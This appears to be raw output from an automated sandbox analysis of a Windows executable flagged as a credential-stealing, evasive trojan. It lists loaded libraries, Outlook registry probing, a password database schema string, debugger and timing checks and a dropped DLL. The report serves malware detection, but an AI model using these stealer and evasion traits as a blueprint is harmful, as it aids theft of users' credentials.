        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370108E03_2_370108E0
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370108F03_2_370108F0
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37524F513_2_37524F51
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_375246E13_2_375246E1
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_375234503_2_37523450
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3752A3183_2_3752A318
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3752208C3_2_3752208C
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3754E3583_2_3754E358
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_375493603_2_37549360
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3754C2683_2_3754C268
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_375445603_2_37544560
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_375499C03_2_375499C0
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_375400403_2_37540040
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_375443403_2_37544340
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3754934F3_2_3754934F
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37548F083_2_37548F08
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37543BB83_2_37543BB8
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37543BA83_2_37543BA8
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3754C25E3_2_3754C25E
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_375486583_2_37548658
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_375486473_2_37548647
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3754FA703_2_3754FA70
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3754BE103_2_3754BE10
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_375482003_2_37548200
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3754BE013_2_3754BE01
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37548EFB3_2_37548EFB
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37548A9F3_2_37548A9F
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37548AB03_2_37548AB0
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3754B55B3_2_3754B55B
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3754B5603_2_3754B560
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3754B1083_2_3754B108
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_375481EF3_2_375481EF
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37547D983_2_37547D98
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3754B9B83_2_3754B9B8
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_375499BB3_2_375499BB
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37547DA83_2_37547DA8
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3754B9A83_2_3754B9A8
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3754A8583_2_3754A858
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3754A8473_2_3754A847
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3754F4D83_2_3754F4D8
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3754B0F83_2_3754B0F8
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3754ACB03_2_3754ACB0
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3754ACA03_2_3754ACA0
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: String function: 00402ACE appears 50 times
        Source: 1258ad6Jpw.exe, 00000000.00000000.854416764.00000000004B2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebaggrundsmaterialet encroachment.exeDVarFileInfo$ vs 1258ad6Jpw.exe
        Source: 1258ad6Jpw.exe, 00000003.00000000.1236638193.00000000004B2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebaggrundsmaterialet encroachment.exeDVarFileInfo$ vs 1258ad6Jpw.exe
        Source: 1258ad6Jpw.exe, 00000003.00000002.2134481077.0000000034657000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 1258ad6Jpw.exe
        Source: 1258ad6Jpw.exeBinary or memory string: OriginalFilenamebaggrundsmaterialet encroachment.exeDVarFileInfo$ vs 1258ad6Jpw.exe
        Source: 1258ad6Jpw.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/9@4/4
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 0_2_004031A3 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004031A3
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_004031A3 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_004031A3
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 0_2_004043E6 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004043E6
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 0_2_004020CD CoCreateInstance,MultiByteToWideChar,0_2_004020CD
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeFile created: C:\Users\user\AppData\Roaming\skivendesJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeMutant created: NULL
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeFile created: C:\Users\user\AppData\Local\Temp\nsa63A2.tmpJump to behavior
        Source: 1258ad6Jpw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: 1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034ADE000.00000004.00000800.00020000.00000000.sdmp, 1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034AD0000.00000004.00000800.00020000.00000000.sdmp, 1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034AC0000.00000004.00000800.00020000.00000000.sdmp, 1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034AFF000.00000004.00000800.00020000.00000000.sdmp, 1258ad6Jpw.exe, 00000003.00000002.2135264916.0000000035A0D000.00000004.00000800.00020000.00000000.sdmp, 1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034AF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: 1258ad6Jpw.exeVirustotal: Detection: 72%
        Source: 1258ad6Jpw.exeReversingLabs: Detection: 62%
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeFile read: C:\Users\user\Desktop\1258ad6Jpw.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\1258ad6Jpw.exe "C:\Users\user\Desktop\1258ad6Jpw.exe"
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess created: C:\Users\user\Desktop\1258ad6Jpw.exe "C:\Users\user\Desktop\1258ad6Jpw.exe"
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess created: C:\Users\user\Desktop\1258ad6Jpw.exe "C:\Users\user\Desktop\1258ad6Jpw.exe"Jump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
        Source: 1258ad6Jpw.exeStatic file information: File size 1113012 > 1048576
        Source: 1258ad6Jpw.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

        Data Obfuscation

        barindex
        Source: Yara matchFile source: 00000000.00000002.1239205290.0000000003586000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37546F17 push dword ptr [ebp+eax-18h]; iretd 3_2_37546F1D
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37544ED6 push edx; retf 3_2_37544ED7
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeFile created: C:\Users\user\AppData\Local\Temp\nsk64CB.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeAPI/Special instruction interceptor: Address: 3B6F4A0
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeAPI/Special instruction interceptor: Address: 27DF4A0
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeRDTSC instruction interceptor: First address: 3B2B228 second address: 3B2B228 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F4CC9192C7Ah 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeRDTSC instruction interceptor: First address: 279B228 second address: 279B228 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F4CC90624FAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeMemory allocated: 3FB0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeMemory allocated: 349E0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeMemory allocated: 344A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsk64CB.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeAPI coverage: 1.9 %
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 0_2_00405665 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405665
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 0_2_004060C7 FindFirstFileA,FindClose,0_2_004060C7
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 0_2_0040270B FindFirstFileA,0_2_0040270B
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_00405665 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,3_2_00405665
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_0040270B FindFirstFileA,3_2_0040270B
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_004060C7 FindFirstFileA,FindClose,3_2_004060C7
        Source: 1258ad6Jpw.exe, 00000003.00000002.2115845591.000000000429D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH4-
        Source: 1258ad6Jpw.exe, 00000003.00000002.2115845591.00000000042CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: 1258ad6Jpw.exe, 00000003.00000002.2115845591.00000000042CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW>
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeAPI call chain: ExitProcess graph end nodegraph_0-3705
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeAPI call chain: ExitProcess graph end nodegraph_0-3879
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeProcess created: C:\Users\user\Desktop\1258ad6Jpw.exe "C:\Users\user\Desktop\1258ad6Jpw.exe"Jump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeQueries volume information: C:\Users\user\Desktop\1258ad6Jpw.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
